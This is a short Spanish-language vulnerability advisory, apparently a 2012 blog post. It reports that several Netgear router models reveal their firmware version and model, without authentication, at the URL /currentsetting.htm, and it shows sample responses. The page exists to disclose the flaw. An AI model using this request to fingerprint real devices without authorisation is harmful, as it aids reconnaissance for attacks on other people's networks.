Revelación de información en dispositivos Netgear

Modelos: DGND3300v2, WNR2000v2, DGN1000, N300 y otros
Firmwares: V2.1.00.48_1.00.48, V1.1.0.41WW, V1.0.0.34_29.0.45NA y otros
Fecha: 26/05/2012
Severidad: Baja
Impacto: Revelación de versión de firmware y modelo.
Vector de ataque: Remoto sin autenticación
Solución: Sin solución
Referencia: CVE no disponible

Varios dispositivos de marca NETGEAR poseen una vulnerabilidad de revelación de información. Es posible conocer la versión de firmware y el modelo del dispositivo al acceder sin autenticación a la url /currentsetting.htm

Para explotar la vulnerabilidad solamente es necesario entrar a la URL:

http://<IP>/currentsetting.htm

Evidencia

 Firmware=A2.1.00.48_1.00.48 RegionTag=DGND3300_WW Region=ww Model=DGND3300v2
 Firmware=V1.1.0.41WW RegionTag=DGN1000_WW Region=WW Model=DGN1000
 Firmware=V1.0.0.34_29.0.45NA RegionTag=WNR2000v2_NA Region=us Model=WNR2000v2

hkm

Share
Esta entrada fue publicada en Exploits, Vulnerabilidades. Guarda el enlace permanente.

Deja un comentario